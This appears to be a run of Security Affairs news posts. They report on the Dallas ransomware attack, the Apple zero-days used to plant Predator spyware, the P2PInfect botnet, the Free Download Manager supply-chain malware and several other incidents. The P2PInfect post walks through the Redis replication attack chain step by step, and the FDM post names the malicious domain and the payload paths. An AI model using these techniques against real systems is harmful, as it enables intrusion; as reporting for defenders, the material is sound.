The City of Dallas revealed that the Royal ransomware gang that hit the city system in May used a stolen account.

In May 2023, a ransomware attack hit the IT systems at the City of Dallas, Texas. To prevent the threat from spreading within the network, the City shut down the impacted IT systems.

The City confirmed the security incident and is working to recover from the ransomware attack that impacted its services, including the police department.

The attack impacted less than 200 devices and essential operations, like 911, remained working. At the time, BleepingComputer reported that the City’s court system canceled all jury trials and jury duty for several days starting from May 2nd.

CBS News Texas obtained an image the ransomware note dropped by the malware on the infected systems.

The Royal ransomware group is behind the attack and threatens to publish stolen data if the City will not meet its ransom demand.

According to the “THE CITY OF DALLAS RANSOMWARE INCIDENT: MAY 2023” report published by the City of Dallas Department of Information & Technology Services ITS Risk Management, Security, and Compliance Services on September 20, 2023, the Royal ransomware group gained access to the City’s infrastructure using a stolen domain service account. Once obtained access to the City’s network, the group performed reconnaissance and information-gathering activities using legitimate third-party remote management tools. Between April 7, 2023, and May 4, 2023, Royal performed data exfiltration and ransomware delivery preparation activities.

The Royal group began reconnaissance activity in April 2023, and the analysis of system log data dates the beginning of the surveillance operations on April 7, 2023.

“Royal’s initial access utilized the basic service domain service account, connecting to a server. Royal was then able to traverse the internal City infrastructure during the surveillance period using legitimate 3rd party remote management tools.” reads the report. “Using the City service account credentials, Royal performed reconnaissance activities in the City’s IT infrastructure during the period of April 7, 2023, through May 4, 2023. During this time, Royal performed data exfiltration and ransomware delivery preparation activities.”

The group was able to steal data from the City and leaked approximately 1.169 TB at a time prior to May 03, 2023.

“During the surveillance period, Royal performed several actions to inject command and control software and established command-and-control beacons. The command-and-control beacons allowed Royal to prepare the City’s network resources for the May 03, 2023, ransomware encryption attack.” continues the report.

Early on the morning of Wednesday, May 03, 2023, the group started executing the ransomware on the City of Dallas. The City experts believe that the group specifically targeted a prioritized list of servers using legitimate Microsoft system administrative tools.

The City immediately initiated mitigation efforts after the discovery of the attack and it started restoring its services with the help of external cybersecurity experts.

The experts spent more than 5 weeks restoring the servers, from May 9 to June 13.

The City reported to the State of Texas Office of the Attorney General (TxOAG) that the personal information of 26,212 residents and a total of 30,253 people was potentially impacted.

According to the notice published on the website of the OAG on August 07, 2023, exposed personal information includes names, addresses, social security information, health information, and health insurance information.

The Dallas City Council has approved a budget of $8.5 million to mitigate the ransomware attack.

The human-operated Royal ransomware first appeared on the threat landscape in September 2022, it has demanded ransoms up to millions of dollars.

Unlike other ransomware operations, Royal doesn’t offer Ransomware-as-a-Service, it appears to be a private group without a network of affiliates.

Once compromised a victim’s network, threat actors deploy the post-exploitation tool Cobalt Strike to maintain persistence and perform lateral movements.

The Royal ransomware is written in C++, it infected Windows systems and deletes all Volume Shadow Copies to prevent data recovery. The ransomware encrypts the network shares, that are found on the local network and the local drives, with the AES algorithm

In March, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) released a joint Cybersecurity Advisory (CSA) to provide organizations, tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with this ransomware family.

According to government experts, the Royal ransomware attacks targeted numerous critical infrastructure sectors including, manufacturing, communications, healthcare and public healthcare (HPH), and education.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, City of Dallas)

The post City of Dallas has set a budget of $8.5 million to mitigate the May Royal ransomware attack appeared first on Security Affairs.

Citizen Lab and Google’s TAG revealed that the three recently patched Apple zero-days were used to install Cytrox Predator spyware.

Researchers from the Citizen Lab and Google’s Threat Analysis Group (TAG) revealed that the three Apple zero-days addressed this week were used as part of an exploit to install Cytrox Predator spyware.

Apple this week released emergency security updates to address three new zero-day vulnerabilities (CVE-2023-41993, CVE-2023-41991, CVE-2023-41992) that have been exploited in attacks in the wild.

The three flaws were discovered by Bill Marczak of The Citizen Lab at The University of Toronto’s Munk School and Maddie Stone of Google’s Threat Analysis Group. The two research teams have already discovered multiple actively exploited zero-days in Apple products that were exploited in targeted attacks against high-profile individuals, such as opposition politicians, dissidents, and journalists.

CVE-2023-41993 is an arbitrary code execution issue that resides in the Webkit.

An attacker can trigger the flaw by tricking the victim into visiting specially crafted web content that may lead to arbitrary code execution. The IT giant addressed the flaw with improved checks.

The second zero-day flaw, tracked as CVE-2023-41991, resides in the Security framework. An attacker can exploit this vulnerability to bypass signature validation using malicious apps. The company fixed the vulnerability by fixing a certificate validation issue.

The third zero-day, tracked as CVE-2023-41992, resides in the Kernel Framework. A local attacker can trigger the flaws to elevate their privileges. Apple fixed the flaw with improved checks.

“Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.” reads the advisory published by the company.

According to Citizen Lab and Google’s Threat Analysis Group (TAG) researchers, threat actors exploited the zero days to target former Egyptian MP Ahmed Eltantawy after he announced his candidacy in the presidential election in 2024.

BIG : WE URGE ALL USERS TO UPDATE THEIR #Apple devices urgently.@citizenlab in coordination with @Google’s TAG team found that former Egyptian MP Ahmed Eltantawy was targeted with Cytrox’s #Predator #spyware through links sent via SMS and WhatsApp.https://t.co/YepUzuLQXU

— Citizen Lab (@citizenlab) September 22, 2023

Threat actors attempted to hack Eltantawy’s device between May and September 2023. The attackers sent decoy SMS and WhatsApp messages to the victim.

“In August and September 2023, Eltantawy’s Vodafone Egypt mobile connection was persistently selected for targeting via network injection; when Eltantawy visited certain websites not using HTTPS, a device installed at the border of Vodafone Egypt’s network automatically redirected him to a malicious website to infect his phone with Cytrox’s Predator spyware.” reads the report published by Citizen Lab. “During our investigation, we worked with Google’s Threat Analysis Group (TAG) to obtain an iPhone zero-day exploit chain (CVE-2023-41991, CVE-2023-41992, CVE-2023-41993) designed to install Predator on iOS versions through 16.6.1. We also obtained the first stage of the spyware, which has notable similarities to a sample of Cytrox’s Predator spyware we obtained in 2021. We attribute the spyware to Cytrox’s Predator spyware with high confidence.”

Google TAG researchers provided details about the iOS exploit chain that was executed by the attackers after the target was redirected to specially crafted web pages. The CVE-2023-41993 flaw is exploited to gain initial remote code execution (RCE) in the Safari browser, then the CVE-2023-41991 issue is used to bypass signature validation, and the vulnerability CVE-2023-41992 is used to escalate privilege to Kernel.

The exploit chain allows attackers to run a small binary to determine whether or not to install the full Predator implant. TAG experts explained that they were unable to capture the full Predator implant.

“The attacker also had an exploit chain to install Predator on Android devices in Egypt. TAG observed these exploits delivered in two different ways: the MITM injection and via one-time links sent directly to the target. We were only able to obtain the initial renderer remote code execution vulnerability for Chrome, which was exploiting CVE-2023-4762.” reads the analysis published by Google TAG. “We assess that Intellexa was also previously using this vulnerability as a 0-day.”

Citizen Lab linked the attacks to the Egyptian government, which is known to be Cytrox’s customer. The researchers also noticed that the surveillance software was delivered via network injection from a device located physically in Egypt.

It was not the first time that the Eltantawy’s phone was infected with Cytrox’s Predator spyware. The first time that Eltantawy’s iPhone was infected with the Cytrox spyware was in November 2021.

Citizen Lab urged all Apple users to update their devices immediately and enable Lockdown Mode.

“This campaign is yet another example of the abuses caused by the proliferation of commercial surveillance vendors and their serious risk to the safety of online users.” concluded the popular TAG researchers Maddie Stone.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Apple)

The post Recently patched Apple and Chrome zero-days exploited to infect devices in Egypt with Predator spyware appeared first on Security Affairs.

US CISA added the flaw CVE-2023-41179 in Trend Micro Apex and other security products to its Known Exploited Vulnerabilities catalog.

US Cybersecurity and Infrastructure Security Agency (CISA) added the high-severity flaw CVE-2023-41179 (CVSS score 7.2) affecting Trend Micro Apex One and Worry-Free Business Security to its Known Exploited Vulnerabilities Catalog.

Trend Micro this week has released security updates to patch an actively exploited zero-day vulnerability, tracked as CVE-2023-41179, impacting endpoint security products, including Apex One, Apex One SaaS, and Worry-Free Business Security products. 

According to the security firm the vulnerability has been exploited in attacks. The flaw is related to the products’ ability to uninstall third-party security software.

An attacker can trigger this vulnerability after it has logged into the product’s administrative console. 

“An arbitrary code execution vulnerability has been identified in the Apex One SaaS, Biz, and VBBSS agents’ ability to uninstall third-party security products. To exploit this vulnerability, an attacker would need to be able to log into the product’s administrative console.” reads the advisory published by Trend Micro. Because an attacker would need to have stolen the product’s management console authentication information in advance, they would not be able to infiltrate the target network using this vulnerability alone.”

The vendor recommends customers update their installs to the latest version as soon as possible.

Trend Micro pointed out that the exploitation of this type of flaw typically requires an attacker to have access to the vulnerable device. To mitigate the risk of exploitation the company recommends allowing access only from trusted networks.

Trend Micro has not shared any information regarding the attacks exploiting this vulnerability.

The Japan CERT already published an alert regarding this vulnerability.

“Since the vulnerability is already being exploited in the wild, the users of the affected products are recommended to update the affected system to the latest version as soon as possible.” reads the alert.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts recommend also private organizations review the Catalog and address the vulnerabilities in their infrastructure.

CISA orders federal agencies to fix this flaw by October 12, 2023.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, CISA)

The post CISA adds Trend Micro Apex One and Worry-Free Business Security flaw to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.

Air Canada, the flag carrier and largest airline of Canada, announced that the personal information of some employees was exposed as a result of a recent cyberattack.

Air Canada, the flag carrier and largest airline of Canada, announced that threat actors had access to the personal information of some employees during a recent cyberattack.

“An unauthorized group briefly obtained limited access to an internal Air Canada system related to limited personal information of some employees and certain records. We can confirm that our flight operations systems and customer facing systems were not affected. No customer information was accessed.” reads the statement published by the company. “We have contacted parties whose information has been involved as appropriate, as well as the relevant authorities.”

The company states that flight operations systems and customer-facing systems were impacted by the cybersattack.

The carrier confirmed that its systems are fully operational, it also announced it has implemented further security measures with the help of leading global cyber security experts.

According to the statement, the attackers had access to one of the company’s internal systems.

The airline notified the impacted employees and the relevant authorities.

Air Canada did not share details about the attack, at the time of this writing, no known extortion group has claimed responsibility for the cyber attack.

A few days ago, the Pro-Russia group NoName057(16) announced to have launched DDoS attacks on several Canadian organizations, including CBSA, the Canadian Air Transport Security Authority, and the Senate.

The attacks severely impacted operations at several Canadian airports last week.

The Canada Border Services Agency (CBSA) confirmed that the attack impacted check-in kiosks and electronic gates at airports. The cyber attack caused delays in the processing of arrivals for more than an hour at border checkpoints across the country.

The Canadian Centre for Cyber Security published an alert warning of a Distributed Denial of Service campaign targeting multiple Canadian sectors.

“Since 13 September 2023, the Cyber Centre has been aware and responding to reports of several distributed denial of service (DDoS ) campaigns targeting multiple levels within the Government of Canada, as well as the financial and transportation sectors.” reads the alert. “This Alert is being published to raise awareness of these campaigns, to highlight the potential impact to government services and to provide guidance for organizations who may be targeted by malicious activity.”

In August 2018, Air Canada suffered another data breach. The company announced that the security incident may have affected  20,000 customers (1%) of its 1.7 million mobile app users.

Air Canada revealed to have detected unusual login behaviour with Air Canada’s mobile App between Aug. 22-24, 2018, it added that financial data was protected, but invited to remain vigilant for fraudulent credit card transactions.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Air Canada)

The post Information of Air Canada employees exposed in recent cyberattack appeared first on Security Affairs.

A previously undocumented APT dubbed Sandman targets telecommunication service providers in the Middle East, Western Europe, and South Asia.

A joint research conducted by SentinelLabs and QGroup GmbH revealed that a previously undetected APT group, dubbed Sandman, is targeting telecommunication service providers in the Middle East, Western Europe, and South Asia.

The APT group is using a modular backdoor, named LuaDream, written in the Lua programming language. LuaDream allows operators to exfiltrate system and user information, paving the way for further targeted attacks.

Sandman has deployed the backdoor utilizing the LuaJIT platform, which is rarely used in the threat landscape. SentinelLabs clarified that LuaJIT is used by the attackers as an attack vector and is used to install additional malware in the target infrastructure.

The attacks are characterized by strategic lateral movements and minimal engagements, likely to minimize the risk of detection.

Threat actors can extend LuaDream’s features by using specific plugins.

The researchers explained that the attacks were detected and interrupted before the deployment of the plugins, however, the analysis of samples of LuaDream previously uploaded on VirusTotal allowed them the analysis of functionalities the plugins. Some of the plugins support command execution capabilities.

The researchers identified a total of 36 distinct LuaDream components, suggesting that we are facing a large-scale project that requires significant effort. The malware supports multiple communication protocols for C2 (Command and Control) operations.

“LuaDream’s staging chain is purposefully crafted to avoid detection and hinder analysis, seamlessly injecting the malware into memory. To achieve this, LuaDream takes advantage of the LuaJIT platform, a just-in-time compiler for the Lua scripting language.” continues the report. “This strategic choice enhances the stealth of malicious Lua script code, making it challenging to detect.”

Sandman is suspected to be a motivated and capable threat actor that carries out cyber espionage activities.

The analysis of compilation timestamps and a string artifact found within LuaDream suggests that the malware dates back to the first half of 2022. The researchers were not able to link LuaDream to any known threat actor, the researchers speculate the threat actor is a private contractor or mercenary group. 

“Attributing Sandman remains a mystery, placing it in the same enigmatic category as Metador and other elusive threat actors who operate with impunity. LuaDream stands as a compelling illustration of the continuous innovation and advancement efforts that cyber espionage threat actors pour into their ever-evolving malware arsenal.” concludes the report.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Sandman APT)

The post Sandman APT targets telcos with LuaDream backdoor appeared first on Security Affairs.

The experts warn of a surge in P2PInfect botnet activity since late August 2023, they are witnessing a 600x jump between September 12 and 19, 2023.

In July 2023, Palo Alto Networks Unit 42 researchers discovered a new peer-to-peer (P2P) worm called P2PInfect that targets Redis servers running on both Linux and Windows systems. The capability to target Redis servers running on both Linux and Windows operating systems makes P2PInfect more scalable and potent than other worms. 

The worm is written in the Rust programming language, it targets Redis instances by exploiting the Lua sandbox escape vulnerability CVE-2022-0543 (CVSS score 10.0).

Cado Security Labs researchers reported to have witnessed a 600x increase in P2Pinfect traffic since August 28th. According to the researchers, traffic experienced a 12.3% surge during the week leading up to the publication of their analysis.

P2Pinfect infections have been reported in China, the United States, Germany, the United Kingdom, Singapore, Hong Kong and Japan.

Experts linked the surge in botnet traffic with the growing number of variants detected in the wild, a circumstance that suggests that the authors are actively improving their bot.

“P2Pinfect activity has increased rapidly with 3,619 events observed during the week of the 12th – 19th of September alone – an increase of 60216.7%!” reads the analysis published by Cado Security Labs. “This increase in P2Pinfect traffic has coincided with a growing number of variants seen in the wild, suggesting that the malware’s developers are operating at an extremely high development cadence. In just one week prior to this blog’s publication, Cado researchers identified a 12.3% increase in P2Pinfect activity.”

Below is the attack chain observed by the researchers:

• Malicious node (designated as Initial Access (IA) Sender by Cado researchers) connects to the target and issues the Redis SLAVEOF command to enable replication.
• The attacker delivers a malicious Redis module to the target, allowing arbitrary shell commands to be run.
• The module is used to execute a command to retrieve the primary payload from a designated downloader node (referred to as IA Downloader), before writing it to /tmp and executing it with the encoded list of botnet peers. The researchers pointed out that this command differs slightly from the one observed in Cado’s original analysis.
• The attacker executes another shell command to remove the Redis module from disk and disables replication via the SLAVEOF NO ONE Redis command.

While the original P2Pinfect bot doesn’t support a persistence mechanism, recent samples of P2Pinfect rely on a cron job to launch the malware every 30 minutes.

Recent samples also support another persistence technique that uses the bash payload to keepalive the main payload. 

Recent P2Pinfect samples overwrite existing SSH authorized_keys files with an attacker-controlled SSH key.

The main payload also iterates through all users on the system and attempts to change their user passwords. The malware changes the passwords to a string prefixed by Pa_ and followed by 7 alphanumeric characters (e.g. Pa_13HKlak). The experts noticed that a new password is generated for each build. The malware uses the Linux chpasswd utility to change the passwords likely because the developer expects to obtain root in the target environment.

Despite the growing sophistication of the malware, P2PInfect’s exact goals are unclear. Cado Security said it observed the malware attempting to fetch a crypto miner payload, but there is no evidence of cryptomining to date.

“It’s clear that P2Pinfect’s developers are committed to maintaining and iterating on the functionality of their malicious payloads, while simultaneously scaling the botnet across continents and cloud providers at a rapid rate. Despite this, the primary objective of this malware remains unclear. Recent variants still attempt to retrieve the miner payload described in Cado’s original analysis, yet no evidence of cryptomining has been detected to date.” concludes the report that includes Indicators of Compromise (IoCs). “The miner payload itself hadn’t been updated since the original discovery in late July, yet the botnet agent received multiple updates in this time. It is expected that those behind the botnet are either waiting to implement additional functionality in the miner payload, or are intending to sell access to the botnet to other individuals or groups.”

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, botnet)

The post Experts warn of a 600X increase in P2Pinfect traffic appeared first on Security Affairs.

Apple released emergency security updates to address three new actively exploited zero-day vulnerabilities.

Apple released emergency security updates to address three new zero-day vulnerabilities (CVE-2023-41993, CVE-2023-41991, CVE-2023-41992) that have been exploited in attacks in the wild.

The three flaws were discovered by Bill Marczak of The Citizen Lab at The University of Toronto’s Munk School and Maddie Stone of Google’s Threat Analysis Group. The two research teams have already discovered multiple actively exploited zero-days in Apple products that were exploited in targeted attacks against high-profile individuals, such as opposition politicians, dissidents, and journalists.

CVE-2023-41993 is an arbitrary code execution issue that resides in the Webkit.

An attacker can trigger the flaw by tricking the victim into visiting specially crafted web content that may lead to arbitrary code execution. The IT giant addressed the flaw with improved checks.

The second zero-day flaw, tracked as CVE-2023-41991, resides in the Security framework. An attacker can exploit this vulnerability to bypass signature validation using malicious apps. The company fixed the vulnerability by fixing a certificate validation issue.

The third zero-day, tracked as CVE-2023-41992, resides in the Kernel Framework. A local attacker can trigger the flaws to elevate their privileges. Apple fixed the flaw with improved checks.

“Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.” reads the advisory published by the company.

The company fixed the three zero-day vulnerabilities with the release of macOS 12.7/13.6, iOS 16.7/17.0.1, iPadOS 16.7/17.0.1, and watchOS 9.6.3/10.0.1.

Fixes are available for iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, iPad mini 5th generation and later

Apple has already patched 16 actively exploited zero-day vulnerabilities in 2023, below is the list of the flaws fixed by the company:

• September 2023 –  CVE-2023-41064 and CVE-2023-41061.
• July 2023 – CVE-2023-37450 and CVE-2023-38606.
• June 2023 – CVE-2023-32434, CVE-2023-32435, and CVE-2023-32439.
• May 2023 – CVE-2023-32409, CVE-2023-28204, and CVE-2023-32373).
• April 2023 – CVE-2023-28206 and CVE-2023-28205.
• February 2023 – CVE-2023-23529.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, zero-day)

The post Apple rolled out emergency updates to address 3 new actively exploited zero-day flaws appeared first on Security Affairs.

The recently discovered Free Download Manager (FDM) supply chain attack, which distributed Linux malware, started back in 2020.

The maintainers of Free Download Manager (FDM) confirmed that the recently discovered supply chain attack dates back to 2020.

Recently, researchers from Kaspersky reported the discovery of a free download manager site that has been compromised to serve Linux malware. While investigating a set of suspicious domains, the experts identified that the domain in question has a deb.fdmpkg[.]org subdomain.

Visiting the subdomain with the browser, the researchers noticed a page claiming that the domain is hosting a Linux Debian repository of software named ‘Free Download Manager’

This package turned out to contain an infected postinst script that is executed upon installation. This script drops two ELF files to the paths /var/tmp/crond and /var/tmp/bs. It then establishes persistence by creating a cron task (stored in the file /etc/cron.d/collect) that launches the /var/tmp/crond file every 10 minutes.” reported Kasperksy.

The “Free Download Manager” version installed by the malicious package was released on January 24, 2020. The experts found comments in Russian and Ukrainian, including information about improvements made to the malware, in the postinst script.

Upon installing the malicious package, the executable /var/tmp/crond is launched on every startup through cron. The executable is a backdoor that accesses the Linux API and invokes syscalls using the statically linked dietlibc library.

Now the maintainers of Free Download Manager (FDM) have shared findings from their investigation. They discovered that a Ukrainian hacker group compromised a specific web page on their web site then used it to distribute the malware.

“Today, informed by the findings from Kaspersky Lab, we became aware of a past security incident from 2020. It appears that a specific web page on our site was compromised by a Ukrainian hacker group, exploiting it to distribute malicious software.” reads the announcement published by the maintainers. “Only a small subset of users, specifically those who attempted to download FDM for Linux between 2020 and 2022, were potentially exposed. It’s estimated that much less than 0.1% of our visitors might have encountered this issue. This limited scope is probably why the issue remained undetected until now. Intriguingly, this vulnerability was unknowingly resolved during a routine site update in 2022.”

The maintainers estimate that the website served the malware to a very limited number of visitors, the maintainers believe that much less than 0.1% of their visitors were impacted. For this reason, the supply chain attack remained undetected for years.

The maintainers announced the enhancement of their defenses and the implementation of additional measures to prevent similar security incidents in the future.

Visitors who attempted to download FDM for Linux from the compromised page during the mentioned timeframe are recommended to scan their systems for the presence of malware and update their passwords.

The maintainers determined that the threat actors exploited a vulnerability in a script on their website to inject the malicious code.

The analysis of files that were part of the site before the compromise (dating back to 2020) revealed the presence of a portion of code used to choose whether to give users the correct download link or a link to the malware-laced version of the files.

“To investigate this problem, we accessed data from our project backups dating back to 2020 and found this modified page, which contained an algorithm that chose whether give users correct download link or the one leading to the fake domain deb.fdmpkg.org containing a malicious .deb file. It had an «exception list» of IP addresses from various subnets, including those associated with Bing and Google.” continues the announcement. “Visitors from these IP addresses were always given the correct download link.” continues the announcement.

FDM has released a script to check for indicators of compromise (IoCs).

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Free Download Manager)

The post Ukrainian hackers are behind the Free Download Manager supply chain attack appeared first on Security Affairs.

Exail Technologies, a high-tech manufacturer whose clients include the US Coast Guard, exposed sensitive company data that could’ve enabled attackers to access its databases.

Exail, a French high-tech industrial group, left exposed a publicly accessible environment (.env) file with database credentials, the Cybernews research team has discovered.

The company, formed in 2022 after ECA Group and iXblue merged, specializes in robotics, maritime, navigation, aerospace, and photonics technologies, making it a particularly juicy target for attackers.

The company fixed the issue after being contacted by our research team. We reached out to Exail for further comment but did not receive a response before publishing.

What Exail data was exposed?

The publicly accessible .env file, hosted on the exail.com website, was exposed to the internet, meaning that anyone could have accessed it.

An environment file serves as a set of instructions for computer programs. Therefore, leaving the file open to anyone might expose critical data and provide threat actors with an array of options for attacking.

According to the team, Exail’s exposed .env file contained database credentials. If the database would have been open to the public, attackers could have used the credentials to access the company’s data. However, in this case, it was not open to the public.

“Once inside, attackers could view, modify, or delete sensitive data and execute unauthorized operations. The publicly hosted environment was exposed to the internet, meaning that anyone could’ve used these credentials to access sensitive information stored in this database,” researchers explained.

Dangerous flavors

According to the team, Exail’s web server version and operating system (OS) flavor were also jeopardized. OS flavor refers to a unique system version with specific features, configurations, software packages, and other specifications.

Exposing this type of data poses a wide array of dangers. Different OSs have specific sets of vulnerabilities, such as unpatched security flaws, default configurations, and known weaknesses.

“If a malicious actor is aware of the OS flavor and version running on the web server, they could target specific vulnerabilities associated with the OS,” researchers said.

Additionally, an exposed web server with known OS flavors could become a target for automated scanning tools, malware, and botnets.

“Once an attacker knows the OS flavor, they can focus their efforts on finding and exploiting vulnerabilities specifically associated with that OS. They can employ techniques like scanning, proving, or using known exploits to gain access to the server or compromise its security,” the team explained.

The attackers could also leverage OS-specific weaknesses to launch denial of service (DoS) attacks against the exposed web server and overwhelm it with a flood of requests, disrupting the server’s operations.

If you want to know more about recommendations provided by CyberNEws to Exail take a look at the original post on CyberNews:

https://cybernews.com/security/exail-technologies-expose-database-access/

About the author: Vilius Petkauskas, Deputy Editor at CyberNews

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Exail Technologies)

The post Space and defense tech maker Exail Technologies exposes database access appeared first on Security Affairs.